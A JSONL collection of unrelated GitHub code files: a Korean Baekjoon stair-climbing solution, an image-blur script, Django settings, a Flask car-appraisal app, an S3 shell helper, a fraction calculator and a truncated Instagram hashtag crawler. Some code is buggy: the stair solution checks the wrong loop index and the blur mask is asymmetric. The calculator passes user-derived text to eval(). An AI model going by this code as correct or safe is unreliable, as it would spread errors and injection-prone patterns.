+{"seq_id":"30098600219","text":"\"\"\" 210616 16:00 항해 37번 by 신영\"\"\"\n\"\"\"\n계단 오르기 게임은 계단 아래 시작점부터 계단 꼭대기에 위치한 도착점까지 가는 게임이다. 각각의 계단에는 일정한 점수가 쓰여 있는데 계단을 밟으면 그 계단에 쓰여 있는 점수를 얻게 된다.\n계단 오르는 데는 다음과 같은 규칙이 있다.\n계단은 한 번에 한 계단씩 또는 두 계단씩 오를 수 있다. 즉, 한 계단을 밟으면서 이어서 다음 계단이나, 다음 다음 계단으로 오를 수 있다.\n연속된 세 개의 계단을 모두 밟아서는 안 된다. 단, 시작점은 계단에 포함되지 않는다.\n마지막 도착 계단은 반드시 밟아야 한다.\n이 게임에서 얻을 수 있는 총 점수의 최댓값을 구하는 프로그램을 작성하시오.\n입력\n입력의 첫째 줄에 계단의 개수가 주어진다.\n둘째 줄부터 한 줄에 하나씩 제일 아래에 놓인 계단부터 순서대로 각 계단에 쓰여 있는 점수가 주어진다. 계단의 개수는 300이하의 자연수이고, 계단에 쓰여 있는 점수는 10, 000이하의 자연수이다.\n출력\n첫째 줄에 계단 오르기 게임에서 얻을 수 있는 총 점수의 최댓값을 출력한다.\n입력 \n6\n10\n20\n15\n25\n10\n20\n출력 75\n\"\"\"\n# from sys import stdin\n# stairs = int(stdin.readline())\n\n# for _ in range(stairs):\n # score = int(stdin.readline())\n # scoreLst.append(score)\n\nstairs = 6\nscoreLst = [10, 20, 15, 25, 10, 20]\nscoreLst.reverse()\n# scoreLst.append(0)\n\nv1Score = 20\nv2Score = 20\nindexV1 = 1\nindexV2 = 2\n\nwhile indexV1 <= len(scoreLst):\n v1Score += scoreLst[indexV1]\n indexV1 += 2\n if indexV1 >= len(scoreLst):\n break\n v1Score += scoreLst[indexV1]\n indexV1 += 1\n\nwhile indexV2 <= len(scoreLst):\n v2Score += scoreLst[indexV2]\n indexV2 += 1\n if indexV1 >= len(scoreLst):\n break\n v2Score += scoreLst[indexV2]\n indexV2 += 2\n\nprint(max(v1Score, v2Score))\n","repo_name":"FrancisJeon/Baekjoon-python","sub_path":"ing/BOJ_2579.py","file_name":"BOJ_2579.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20517576017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 25 10:59:17 2020\r\n\r\n@author: sandhya chettiar\r\n\"\"\"\r\n\r\nfrom skimage import data\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#Image reading\r\n\r\nimg = data.text()\r\nplt.gray()\r\n\r\n\r\nm, n = img.shape\r\n\r\nmask = [[1,2,1],\r\n [2,4,2],\r\n [1,2,2]]\r\nmask = np.array(mask)\r\n\r\nmask = mask/16\r\n\r\n\r\nimg_new = np.zeros([m, n])\r\n\r\nfor i in range(1,m-1):\r\n for j in range(1,n-1):\r\n temp = img[i-1,j-1]*mask[2-0,2-0] + img[i-1,j]*mask[2-0,2-1] + img[i-1,j+1]*mask[2-0,2-2] + img[i,j-1]*mask[2-1,2-0] + img[i,j]*mask[2-1,2-1] + img[i,j+1]*mask[2-1,2-2] + img[i+1,j-1]*mask[2-2,2-0] + img[i+1,j]*mask[2-2,2-1] +img[i+1,j+1]*mask[2-2,2-2]\r\n\r\n img_new[i,j] = temp\r\n \r\n\r\n\r\nimg_new = img_new.astype(np.uint8)\r\nplt.figure(1)\r\nplt.subplot(1,2,1)\r\nplt.imshow(img)\r\n\r\nplt.subplot(1,2,2)\r\nplt.imshow(img_new)\r\n\r\nplt.show()\r\n","repo_name":"Sandhya18Chettiar/Digital-Image-Processing-Lab","sub_path":"gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"2229732009","text":"#coding: utf-8\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport os\n\nfrom .settings_base import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ['DATABASE_NAME'],\n 'USER': os.environ['DATABASE_USERNAME'],\n 'PASSWORD': os.environ['DATABASE_PASSWORD'],\n 'HOST': os.environ['DATABASE_HOST'],\n }\n}\n\nEMAIL_HOST = 'smtp.yandex.ru'\nEMAIL_HOST_USER = 'noreply@erofeimarkov.ru'\nEMAIL_HOST_PASSWORD = os.environ['SMTP_PASSWORD']\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\nDEBUG = False\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s PID#%(process)d [%(levelname)s] %(name)s: %(message)s at %(pathname)s line %(lineno)d'\n },\n },\n 'handlers': {\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '/var/log/uwsgi/django.log',\n 'formatter': 'verbose',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['default'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n '': {\n 'handlers': ['default'],\n 'level': 'DEBUG',\n },\n },\n}\n","repo_name":"migunow/erofeimarkov","sub_path":"app/erofeimarkov/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1491214083","text":"from unittest import mock\n\nimport pandas as pd\nimport pytest\n\nfrom metadata.core import Metadata\nfrom pipeline_dataops.extract.core import from_api\n\n\n@pytest.fixture\ndef mocked_requests():\n with mock.patch(\"requests.get\") as mock_get:\n yield mock_get\n\n\n@pytest.mark.skip(\n reason=\"\"\"\n Not implemented yet.\n This test, 'test_from_api', is an integration test because it tests\n the interaction between the 'from_api' function and the actual API endpoint.\n It checks if the function correctly handles responses from the API and\n properly processes the raw data. Therefore, it involves the integration\n of multiple components of the system, and not just the behavior of\n individual units in isolation.\n \"\"\"\n)\ndef test_from_api(sample_raw_df):\n assert True\n","repo_name":"gao-hongnan/TheBareOps","sub_path":"pipeline-dataops/tests/integration/extract/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"1783654694","text":"from flask import Flask, request, jsonify, abort, redirect, url_for, render_template, send_file, flash\nfrom bs4 import BeautifulSoup\nimport requests, statistics\nimport openpyxl\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, FileField\nfrom wtforms.validators import DataRequired\nimport os\nfrom werkzeug.utils import secure_filename\nimport auto\nimport json\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config.update(dict(\n SECRET_KEY=\"powerful secretkey\",\n WTF_CSRF_SECRET_KEY=\"a csrf secret key\"\n))\n\n \n@app.route('/')\ndef redir_submit():\n return redirect(url_for('index'))\n\nclass MyForm(FlaskForm):\n # name = 'name'\n file = FileField(validators=[DataRequired()]\n )\n# @app.route('/index', methods=['GET', 'POST'])\n# def form():\n\n# #Причем в начале проверяем наличие авторизации, если флага нет, то кидаем обработку 401 ошибки и не даем работать с прогой\n# # if not session.get('logged_in'):\n# # abort(401)\n\n# \"\"\"\n# Тут делаем что-то полезное в случае успешной авторизации\n# \"\"\"\n\n# return render_template('index.html')\n\n\n@app.route('/submit', methods=('GET', 'POST'))\ndef submit():\n form = MyForm()\n \n if form.validate_on_submit():\n f = form.file.data\n filename = 'analogi.xlsx'\n f.save(os.path.join(filename))\n auto.autoru_appraiser(filename)\n \n\n return send_file(filename,\n mimetype='xlsx',\n # attachment_filename=filename,\n as_attachment=True)\n \n return render_template('submit.html', form=form)\n\n\n@app.errorhandler(500)\ndef page_not_found(e):\n error = 'Произошла ошибка при работе скрипта, вероятно auto.ru опять показывает капчу. Сообщите об этом Алексею прямо сейчас.'\n return render_template('index.html', error=error), 500\n\n\ndef get_dropdown_values():\n\n \"\"\"\n dummy function, replace with e.g. database call. 
If the data does not change, this function is not needed and the dictionary\n could be defined globally\n \"\"\"\n with open('marks_and_models.json', 'r', encoding='utf-8') as fh: # open the file for reading\n class_entry_relations = json.load(fh)\n\n return class_entry_relations\n\n\n@app.route('/_update_dropdown')\ndef update_dropdown():\n\n # the value of the first dropdown (selected by the user)\n selected_class = request.args.get('selected_class', type=str)\n\n # get values for the second dropdown\n updated_values = get_dropdown_values()[selected_class]\n\n # create the values in the dropdown as an html string\n html_string_selected = ''\n for entry in updated_values:\n html_string_selected += '<option value=\"{}\">{}</option>'.format(entry, entry)\n\n return jsonify(html_string_selected=html_string_selected)\n\n\n@app.route('/_process_data')\ndef process_data():\n selected_class = request.args.get('selected_class', type=str)\n selected_entry = request.args.get('selected_entry', type=str)\n\n # process the two selected values here and return the response; here we just create a dummy string\n\n return jsonify(random_text=\"you selected {} and {}\".format(selected_class, selected_entry))\n\n\n@app.route('/index', methods=('GET', 'POST'))\ndef index():\n\n \"\"\"\n Initialize the dropdown menus\n \"\"\"\n form = MyForm()\n \n if request.method == 'POST':\n filename = 'shablon.xlsx'\n f = openpyxl.load_workbook(filename)\n sheetobject = f['Объекты оценки']\n sheetobject.cell(row=2, column=1).value = request.form['all_classes']\n sheetobject.cell(row=2, column=2).value = request.form['all_entries']\n sheetobject.cell(row=2, column=3).value = request.form['obj_year']\n sheetobject.cell(row=2, column=4).value = request.form['obj_engvol']\n sheetobject.cell(row=2, column=5).value = request.form['obj_hp']\n sheetobject.cell(row=2, column=9).value = request.form['obj_kpp']\n sheetobject.cell(row=2, column=7).value = request.form['obj_gear']\n sheetobject.cell(row=2, column=6).value = request.form['obj_eng']\n sheetobject.cell(row=2, column=8).value = request.form['obj_tob']\n sheetobject.cell(row=2, column=11).value = request.form['obj_mileage']\n filename = 'analogi.xlsx'\n \n f.save(os.path.join(filename))\n \n auto.autoru_appraiser(filename)\n \n\n return send_file(filename,\n mimetype='xlsx',\n # attachment_filename=filename,\n as_attachment=True)\n\n class_entry_relations = get_dropdown_values()\n\n default_classes = sorted(class_entry_relations.keys())\n default_values = class_entry_relations[default_classes[0]]\n\n return render_template('index.html',\n all_classes=default_classes,\n all_entries=default_values)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"DemalexS/appreser","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
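`get_dropdown_values` above expects `marks_and_models.json` to map every make to its list of models, i.e. something shaped like this (entries invented for illustration):

    {
        "Audi": ["A4", "A6", "Q5"],
        "Lada": ["Granta", "Vesta"]
    }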
+{"seq_id":"4615108400","text":"import re\nimport subprocess\n\n\nbucket_path = \"s3://zapata-zmachine/projects/bp-combustion-project/phase-2/mpea-runtime/data/publication-data/cisd_rdms/\"\naws_profile = \"--profile zapata-zmachine\"\nls_cmd = \"aws s3 ls \"\ncp_cmd = \"aws s3 cp \"\nuntar_cmd = \"tar zxvf \"\ntar_cmd = \"tar zcvf \"\n\n\ndef compress_and_upload(target, result, path=None):\n \"\"\"Little function to compress a file with tar zcvf and\n upload it to amazon with path appended to the bucket_path\n Args:\n target: the path of the target file to compress and upload\n result: the path where to store the compressed file\n path: Optionally, the subfolder where to upload the file in the\n S3 bucket\n \"\"\"\n\n compress_cmd = tar_cmd + result + \" \" + target\n print(compress_cmd)\n subprocess.check_output(compress_cmd, shell=True)\n\n upload_cmd = cp_cmd + result + \" \" + bucket_path + path + \" \" + aws_profile\n print(upload_cmd)\n subprocess.check_output(upload_cmd, shell=True)\n\n\ndef download_and_uncompress(target):\n \"\"\"Little function to download a file from AWS S3\n and uncompress it with tar zxvf.\n Args:\n target: The path to append to the bucket path to get the file\n \"\"\"\n\n download_cmd = cp_cmd + bucket_path + target + \" . \" + aws_profile\n print(download_cmd)\n subprocess.check_output(download_cmd, shell=True)\n\n filename = re.sub(r\".*/\", \"\", target)\n\n uncompress_cmd = untar_cmd + filename\n print(uncompress_cmd)\n subprocess.check_output(uncompress_cmd, shell=True)\n\n\n# @profile\ndef main():\n\n mol_search = re.compile(\".*molecule: '([A-Z0-9]*)'\")\n act_search = re.compile(\".*nactiveorbs: '([A-Z0-9]*)'\")\n type_search = re.compile(\".*orb-type: '([ A-Za-z0-9]*)'\")\n path_search = re.compile(\".*hamiltonian: '([^']*)'\")\n missing_rdms = set()\n found_rdms = set()\n n_rdms = 0\n with open(\"hamiltonian_data\", \"r\") as f:\n for line in f:\n match_mol = mol_search.search(line)\n match_act = act_search.search(line)\n match_type = type_search.search(line)\n if match_type:\n n_rdms += 1\n molname = match_mol.group(1)\n nactiveorbs = match_act.group(1)\n orbtype = match_type.group(1)\n\n if orbtype == \"MP2 NOs\":\n orbtype = \"NOs\"\n newname = molname + \"-\" + nactiveorbs + \"-\" + orbtype + \"-cisd-rdm.tgz\"\n\n ham_path = path_search.search(line).group(1)\n print(ham_path)\n folder_path = re.sub(\"hamiltonian.tgz\", \"\", ham_path)\n ls_folder = subprocess.check_output(\n ls_cmd + \"s3://zapata-zmachine/\" + folder_path + \" \" + aws_profile,\n shell=True,\n )\n if \"cisd-rdm\" not in str(ls_folder):\n print(f\"CISD RDM missing for {molname}, {nactiveorbs}, {orbtype}.\")\n missing_rdms.add(newname)\n else:\n found_rdms.add(newname)\n cisd_cp_cmd = (\n \"aws s3api copy-object --copy-source \"\n + \"zapata-zmachine/\"\n + folder_path\n + \"cisd-rdms.tgz\"\n + \" --bucket zapata-zmachine --key projects/bp-combustion-project/phase-2/mpea-runtime/data/publication-data/cisd_rdms/\"\n + newname\n + \" \"\n + aws_profile\n )\n cp_output = subprocess.check_output(cisd_cp_cmd, shell=True)\n\n assert len(missing_rdms) + len(found_rdms) == n_rdms\n print(\"The missing RDMs are:\")\n print(missing_rdms)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yannnbingz/madtequila-benchmark","sub_path":"grouping_data/Gather_CISD_RDMs.py","file_name":"Gather_CISD_RDMs.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"19469030160","text":"#This method goes through the string and returns the index of the nextOperand.\n#If there isn't another operand None is returned\ndef findNextOperand(string):\n for i in range (0, len(string)):\n if isOperand(string[i]):\n return i\n#This method finds the end of a segment. A segment is defined as one number, fraction, or mixed number\n#so it just finds the index of the first segment breaker (anything in the string terminators). If one \n#is not found the length of the string is returned.\ndef findSegmentEnd(string):\n terminators = '+-/*^()'\n for i in range (0, len(string)):\n if string[i] in terminators:\n return i\n return len(string)\n#This finds the end of segment in a similar manor to findSegmentEnd, but it is used before spaces are removed\n#so spaces are considered a segment breaker. However, in a mixed number a space is mandatory so it determines\n#if the space is just part of a mixed number to prevent false positives. If there is no segment end in the string\n#the length of the string is returned.\ndef findSegmentEndWithSpaces(string):\n terminators = '+-/*^() '\n for i in range (0, len(string)):\n if string[i] in terminators:\n if(string[i] == \" \"):\n if followedByFraction(string[i+1:]):\n return i\n else:\n return i\n\n return len(string)\n\n#This method determines if before the next operator or parentheses there is a \\ indicating a fraction. \n#This is used to ensure spaces are not removed that belong to a mixed number.\ndef followedByFraction(string):\n terminators = '+-/*^() '\n for i in range (0, len(string)):\n if string[i] in terminators:\n return False\n elif string[i] == \"\\\\\":\n return True\n return False\n\n#This method goes through the string and converts all negatives into (0-negative) to make the string parsing\n#of converting into custom classes simpler.\ndef fixNegatives(string):\n newString = \"\"\n forValue = 0\n if string[0] == \"-\":\n newString += \"(0-\"\n indexOfNumberEnd = findSegmentEndWithSpaces(string[1:]) + 1\n portion = string[1:indexOfNumberEnd]\n newString += portion\n newString += \")\"\n forValue = indexOfNumberEnd\n while forValue < len(string) :\n if (string[forValue] == \" \" or string[forValue] == \"(\") and string[forValue+1] == \"-\" and (isNumber(string[forValue + 2]) or string[forValue+2] == \".\"):\n if(string[forValue] == \"(\"):\n newString += \"(\"\n indexOfTermEnd = findSegmentEndWithSpaces(string[forValue+2:]) + forValue + 2\n term = string[forValue+2:indexOfTermEnd]\n newString = newString + \"(0-\" + term + \")\"\n forValue = indexOfTermEnd\n else:\n newString += string[forValue]\n forValue += 1\n return newString\n\n\n#This method goes through the string and removes any spaces unless it is followed by a fraction and that spaces is necessary.\n#This is to make the string parsing of converting terms into a custom class simpler.\ndef removeSpaces(string):\n newString = \"\"\n for i in range (0, len(string)):\n if string[i] != \" \":\n newString += string[i]\n else:\n if (isOperand(string[i-1]) == False and followedByFraction(string[i+1:])):\n newString += string[i]\n return newString\n\n#This method goes through the entire expression and converts it into the form \"fracList[0] operator fracList[1]...\". This is so\n#eval can be called on the expression even though it has fractions and mixed numbers. 
It does this by building a new String keeping\n#operators, parentheses, and converting the terms into a custom class and appending it onto fracList.\ndef fractionalize(expression):\n lastIndex = 0\n alreadyConverted = \"\"\n segmentEnd = 0\n fracList = []\n #Append first\n indexOfFirstOperand = findNextOperand(expression)\n subExpression = expression[:indexOfFirstOperand]\n for i in range (0, len(subExpression)):\n if subExpression[i] == \"(\" or subExpression[i] == \")\":\n alreadyConverted += subExpression[i]\n else:\n segmentEnd = findSegmentEnd(expression[i:]) + i\n firstTerm = subExpression[i:segmentEnd]\n fractionVersion = convertToFraction(firstTerm)\n fracList.append(fractionVersion)\n alreadyConverted += \"fracList[\" + str(len(fracList) - 1) + \"]\"\n break\n\n #Continue on with the rest of the expression\n for x in range (segmentEnd, len(expression)):\n if expression[x] == \")\":\n alreadyConverted += expression[x]\n elif isOperand(expression[x]):\n if (expression[x] == \"^\"):\n alreadyConverted += \"**\"\n else:\n alreadyConverted += expression[x]\n while ( expression[x+1] == \"(\" or expression[x+1] == \")\" ):\n alreadyConverted += expression[x+1]\n x+=1\n x+=1\n segmentEnd = findSegmentEnd(expression[x + 1:])\n term = expression[x:segmentEnd + x + 1]\n fractionVersion = convertToFraction(term)\n fracList.append(fractionVersion)\n alreadyConverted += \"fracList[\" + str(len(fracList) - 1) + \"]\"\n return alreadyConverted, fracList\n\n\n#This method determines if something is a number. If it is, True is returned. If not, False is returned. This is used in ConvertToFraction\ndef isNumber(string):\n try:\n float(string)\n return True\n except ValueError :\n return False\n\n\n#This method takes a String and converts it into either a decimal or fraction. If the term is a mixed number\n#this method will convert that into an impromper fraction.\ndef convertToFraction(string):\n if isNumber(string):\n \treturn decimal(float(string))\n elif \" \" in string:\n separator = string.find(\" \")\n numberPart = float(string[:separator])\n fractionPart = string[separator + 1 :]\n separator = fractionPart.find(\"\\\\\")\n numerator = float(fractionPart[:separator])\n denominator = float(fractionPart[separator + 1:])\n return fraction(numerator + numberPart * denominator, denominator)\n else:\n separator = string.find(\"\\\\\")\n numerator = float(string[:separator])\n denominator = float(string[separator + 1:])\n return fraction(numerator, denominator)\n\n#This method returns true if a character is an operator and false if it isn't\ndef isOperand(char):\n operands = '+-/*^'\n return char in operands\n\n#This method uses Euclids algorithim to find the GCD of two numbers.\ndef gcd (a , b) :\n a = float(a)\n b = float(b)\n if a == 0:\n return b\n else:\n return gcd(b % a, a)\n\n#This method finds the least common multiple by multipling the two numbers together (guaranteed to be a multiple)\n#and dividing that product by the gcd.\ndef lcm(a, b):\n return a * b / gcd(a,b)\n\n'''\nThe fraction class is used to hold both mixed numbers and fractions. Mixed numbers are stored as impromper fractions.\nThis class overides the standard operators, the toString method, the float method, and has a the helper methods simplifyToMixedNumber, \nsimplify, and reciprocal. 
\n'''\nclass fraction :\n\t#The constructor just takes the given parameters (numerator and denominator) and\n\t#sets the proper values within the class\n def __init__(self , Numerator=0, Denominator=1) :\n self.numerator = Numerator\n self.denominator = Denominator\n #This method returns a string representation of the fraction. It first simpifies the fraction (part of simplifytoMixedNumber)\n #and if possible converts it into a mixed number. It then returns the fraction in the form A B\\C, but if A is 0 it just returns B\\C\n #and if B is 0 it just returns A.\n def __str__(self) :\n if(self.denominator == 0):\n return \"Please Do Not Divide By Zero\"\n simplified = self.simplifyToMixedNumber()\n frac = simplified[1]\n if simplified[0] == 0:\n return str(simplified[1].numerator) + \"\\\\\" + str(simplified[1].denominator)\n elif simplified[1].numerator == 0 :\n return str(simplified[0])\n else:\n return str(simplified[0]) + \" \" + str(simplified[1].numerator) + \"\\\\\" + str(simplified[1].denominator)\n #This method returns a fraction of the product of the two given fractions.\n def __mul__(self , other) :\n product = fraction(self.numerator*other.numerator , self.denominator*other.denominator)\n return product\n #This method gets a float aproximation of the fraction by dividing the numerator by the denominator.\n def __float__(self) :\n return float(self.numerator)/self.denominator\n #This method gets the reciporcal by simplify flipping the numerator and denominator\n def reciprocal(self) :\n inverse = fraction(self.denominator , self.numerator)\n return inverse\n \t#This method subtracts two fractions by first putting them over a common denominator then subtracting. It returns\n \t#a fraction.\n def __sub__(self, other):\n leastCommonMultiple = lcm(self.denominator, other.denominator)\n fracOne = fraction((self.numerator) * (leastCommonMultiple / (self.denominator)) , leastCommonMultiple)\n fracTwo = fraction((other.numerator) * (leastCommonMultiple / other.denominator), leastCommonMultiple)\n return fraction(fracOne.numerator - fracTwo.numerator, leastCommonMultiple)\n #This method adds two fractions by first putting them over a common denominator then adding. It returns\n \t#a fraction.\n def __add__ (self, other):\n leastCommonMultiple = lcm(self.denominator, other.denominator)\n fracOne = fraction((self.numerator) * (leastCommonMultiple / (self.denominator)) , leastCommonMultiple)\n fracTwo = fraction((other.numerator) * (leastCommonMultiple / other.denominator), leastCommonMultiple)\n return fraction(fracOne.numerator + fracTwo.numerator , leastCommonMultiple)\n #This method divides two fractions by returning the product of the first fraction and the reciprocal of the second\n def __truediv__(self, other):\n recip = fraction(other.denominator, other.numerator)\n return self * recip\n #This method handles fractional exponents. It first determines if the given radical is invalid throwing an invalidRadical exception.\n #If not then it solves the fractional exponent. 
If the output is a decimal value it returns a decimal to make things clear for the user.\n def __pow__ (self, power):\n if float(self) < 0 and float(power) % 2 == 0:\n raise invalidRadical\n if float(power) >= 0:\n partOne = fraction(self.numerator ** (1/power.denominator), self.denominator ** (1/power.denominator))\n partTwo = fraction(partOne.numerator ** power.numerator, partOne.denominator ** power.numerator)\n if(float.is_integer(partTwo.numerator) and float.is_integer(partTwo.denominator)):\n return partTwo\n else:\n return decimal(float(partTwo))\n else:\n power = fraction(abs(power.numerator), abs(power.denominator)) # magnitude of the exponent; fraction defines no __abs__\n partOne = fraction(self.numerator ** power.denominator, self.denominator ** power.denominator)\n partTwo = fraction(partOne.numerator ** (1/power.numerator), partOne.denominator ** (1/power.numerator))\n return fraction.reciprocal(partTwo)\n #This method simplifies a fraction to the lowest possible numerator and denominator.\n def simplify(self):\n if(self.numerator == 0):\n return fraction(0, 1)\n else:\n greatestCommonDemoniator = gcd(self.numerator, self.denominator)\n return fraction(self.numerator / greatestCommonDemoniator, self.denominator / greatestCommonDemoniator)\n #This method converts a fraction into a mixed number with the fraction portion in simplest terms. It returns\n #a tuple of the preceding number and the fraction.\n def simplifyToMixedNumber(self):\n if self.numerator >= self.denominator:\n numberPart = int(self.numerator / self.denominator)\n remainder = self - fraction(numberPart, 1)\n return numberPart , remainder.simplify()\n return 0, self.simplify()\n\n#This method takes in a number and finds the length of its mantissa by determining the length\n#of its string version after the period.\ndef lenMantessa (number):\n stringVersion = str(number)\n indexOfDecimal = stringVersion.find(\".\")\n return len(stringVersion[indexOfDecimal + 1:])\n'''\nThe custom class decimal inherits from fraction and is used for non-fraction/mixed number entries.\nThe purpose of this is such that all decimals are compatible with fractions (so an error isn't raised\nwhen doing an operation on a fraction and a decimal). As well, because a custom class is used, custom exceptions\ncan be thrown such as the invalidRadical. \n'''\nclass decimal (fraction):\n\t#The constructor in essence converts each decimal into a fraction that has a numerator and denominator. \n\t#However, by using a custom class instead of just making every decimal a fraction, the toString can output\n\t#a more appropriate result. This method works by finding the length of the mantissa, multiplying the decimal\n\t# times 10 ^ (length of mantissa) and making the denominator 10 ^ length of the mantissa. 
The fraction is then simplified.\n def __init__(self, numerator=0):\n length = lenMantessa(numerator)\n newNumerator = numerator * 10 ** length\n denominator = 10 ** length\n greatestCommonDemoniator = abs(gcd(newNumerator, denominator))\n fraction.__init__(self, newNumerator / greatestCommonDemoniator, denominator / greatestCommonDemoniator)\n #toString method which just returns a string of the float value of each decimal.\n def __str__(self):\n decimalValue = self.numerator / self.denominator\n return str(decimalValue)\n #If one of the items is a fraction it calls the fraction class's mulitplication method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are multiplied together\n def __mul__(self, other):\n if type(other) == type(fraction()):\n return fraction.__mul__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne * fractionTwo)\n #If one of the items is a fraction it calls the fraction class's subtractaction method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are subtracted together\n def __sub__(self, other):\n if type(other) == type(fraction()):\n return fraction.__sub__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne - fractionTwo)\n #If one of the items is a fraction it calls the fraction class's addition method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are added together\n def __add__(self, other):\n if type(other) == type(fraction()):\n return fraction.__add__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne + fractionTwo)\n #If one of the items is a fraction it calls the fraction class's division method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are divided.\n def __truediv__(self, other):\n if type(other) == type(fraction()):\n return fraction.__truediv__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne / fractionTwo)\n #If one of the items is a fraction it calls the fraction class's division method to correct typing errors and \n #provide the proper output, if not the method checks to see if there is an invalid radical and if there isn't\n #takes float value of the number to power of the float value of the other. If there is an invalid radical\n #an exception is thrown.\n def __pow__(self, power):\n if type(power) == type(fraction()):\n return fraction.__pow__(self, power)\n else:\n fractionOne = float(self)\n powerDecimal = float(power)\n if decimal(power).denominator %2 == 0 and fractionOne < 0:\n raise invalidRadical\n else:\n return decimal(fractionOne ** powerDecimal)\n\n\n#If a radical is invalid such as -2 ^ 1\\2 then this exception is thrown.\n#A custom exception is used to properly give an error message to the user.\nclass invalidRadical (Exception):\n pass\n\n'''\nThis method handles the entire programs control flow. It runs a loop that takes in inputs, readies them\nfor evaluation, evaluates, then repeats. If an error arises then the method prints out an error messgae\ninforming the user as to avoid any crashes. 
The main loop only concludes when the user enters\nthe keyword 'done' (case insensitive)\n'''\ndef main():\n print(\"At any point to end the session please enter \\'done\\'\")\n while True:\n expression = input(\"Please Enter An Expression: \")\n if expression != None and expression != \"\":\n if(expression.lower() == \"done\"):\n print (\"Session Concluded\")\n break\n else:\n try:\n expression = fixNegatives(expression)\n expression = removeSpaces(expression)\n fractionalized = fractionalize(expression)\n expressionAsString = fractionalized[0]\n fracList = fractionalized[1]\n except:\n print (\"The syntax behind your expression is invalid. Please refer to the Readme file.\")\n continue\n try:\n evaluate = eval(expressionAsString)\n print(evaluate)\n except ZeroDivisionError:\n print (\"Please Don't Divide by Zero\")\n except invalidRadical:\n print(\"Invalid Radical\")\n except:\n print(\"Invalid Expression\")\n else:\n print (\"You didn't enter anything\")\n\n\n\nmain() #Start program\n\n","repo_name":"jasonscharff/ATCS-PythonCalculator","sub_path":"mainDoc.py","file_name":"mainDoc.py","file_ext":"py","file_size_in_byte":18463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
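A note on the calculator record above: its fraction/decimal class pair re-implements what the standard library's fractions.Fraction already provides (exact rational arithmetic with full operator overloading). A short comparison sketch, independent of the record's string parser:

from fractions import Fraction

# The operations the record implements by hand, using the stdlib type.
print(Fraction(1, 3) + Fraction(1, 6))        # 1/2
print((Fraction(9, 4) - Fraction(1, 4)) / 2)  # 1

# A mixed number written as "2 1\4" in the record's syntax is just 2 + 1/4.
print(2 + Fraction(1, 4))                     # 9/4

The record still earns its keep as an exercise: the parsing, the custom exception, and the mixed-number printing are exactly the parts Fraction does not do for you.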
+{"seq_id":"31446717923","text":"import json\nimport logging\nimport os\nimport time\n\nfrom instagram_selenium_crawler import Client, InstagramCommonCrawler, InstagramHashtagCrawler\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ntarget_hashtag = '###target_hashtag_without_sharp###'\nlogin_account_id = '###instagram_login_id###'\nlogin_account_pw = '###instagram_login_pw###'\n\ndirname = f'hashtag/{target_hashtag}/'\nfilename_prefix = f'{int(time.time())}_{target_hashtag}'\n\nos.makedirs(dirname, exist_ok=True)\n\nclient = Client(headless=False)\n\nnext_max_id = None\nnext_page = None\n\n# next_max_id=\"QVFBM21Bam5wdHNjM1V4R1dvMnNxYURONzRmbEdHTm5ucVlrcDc0QnEtS2RMRVN6UlkxTE5TcGtnbDNnN1JqXzlaWVh2RmNzQ1dHUWpLdzg4WnlFVk1mbg==\"\n# next_media_ids= [\n# \"2714711203075369621\",\n# \"2714740669070384594\"\n# ]\n# next_page=1672\n\n\ndef get_hashtag_posts(target_hashtag, next_max_id=None, next_media_ids=None, next_page=None):\n hashtag_json_str = hashtag.get_hashtag_posts(target_hashtag, next_max_id, next_media_ids, next_page)\n filename = f\"{dirname}{filename_prefix}_{next_page if next_page else 0}.json\"\n print(filename)\n\n with open(filename, 'w', newline='') as f:\n f.write(hashtag_json_str)\n\n hashtag_json = json.loads(hashtag_json_str)\n\n if next_max_id is None:\n next_max_id = hashtag_json['data']['recent']['next_max_id']\n next_page = hashtag_json['data']['recent']['next_page']\n next_media_ids = hashtag_json['data']['recent']['next_media_ids']\n else:\n next_max_id = hashtag_json['next_max_id']\n next_page = hashtag_json['next_page']\n 